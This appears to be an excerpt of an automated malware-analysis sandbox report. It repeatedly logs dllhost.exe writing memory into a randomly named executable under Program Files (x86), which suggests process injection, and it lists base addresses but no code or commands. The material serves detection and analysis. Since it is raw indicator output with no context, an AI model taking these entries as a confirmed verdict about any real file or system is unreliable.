Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2510000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3140000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2420000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 23E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2400000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2AE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2200000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2780000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2EB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1110000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2B20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2120000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 21B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3020000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2E70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2310000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 25E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2600000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1530000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1550000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1220000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2CF0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 26F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2710000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 27E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: CC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: C70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1490000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 3060000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2050000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2240000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2260000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 5F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1370000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 630000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 650000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: DE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 1180000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 22F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\pjsDgtaXiJfCKIklXamIjJuMmvOyuMAOTvuryqXtWBKeAiGnuiIcqHTZdGJtMQuHolL\cbqXnSEGOVXp.exe base: 2730000
